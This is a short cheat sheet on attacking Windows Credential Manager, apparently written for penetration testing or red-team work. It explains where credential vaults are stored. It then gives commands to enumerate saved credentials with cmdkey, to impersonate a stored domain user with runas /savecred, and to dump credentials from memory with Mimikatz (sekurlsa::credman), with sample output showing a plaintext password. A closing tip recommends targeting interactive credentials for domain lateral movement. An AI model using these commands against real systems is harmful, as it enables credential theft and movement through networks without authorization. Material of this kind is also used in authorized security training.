Windows Credential Manager
- Credential Manager (since Windows 7/2008 R2) stores saved credentials for apps, websites, networks, and services.
- Credentials are saved in Vaults (also called Credential Lockers) and encrypted with DPAPI.
Storage Locations:
%UserProfile%\AppData\Local\Microsoft\Vault\%UserProfile%\AppData\Local\Microsoft\Credentials\%ProgramData%\Microsoft\Vault\%SystemRoot%\System32\config\systemprofile\AppData\...
Each vault includes a Policy.vpol file with AES-128/256 keys, protected by DPAPI.
Newer systems may use Credential Guard to prevent dumping.
Credential Types:
| Name | Used For |
|---|---|
| Web Credentials | Websites (used by IE and older Edge) |
| Windows Credentials | Logins for network shares, OneDrive, RDP, etc. |
Enumerate saved credentials
cmdkey /list
# Example output:
Target: Domain:interactive=CORP\phpheker
Type : Domain Password
User : CORP\phpheker
Impersonate a stored user
# Get a new shell as phpheker if credentials are valid.
runas /savecred /user:CORP\phpheker cmd
Extract Credentials with Mimikatz
Dump Credential Manager entries from memory:
privilege::debug
sekurlsa::credman
Example Output:
User Name : phpheker
Domain : CORP
Logon Server: DC01
credman:
* Username : phpheker@company.local
* Domain : onedrive.live.com
* Password : Coffee123!
More Tools for Vault/DPAPI extraction:
MimikatzSharpDPAPILaZagneDonPAPI
success
- Credentials like
virtualapp/didlogicalare safe to ignore. - Target
interactivecredentials for domain lateral movement.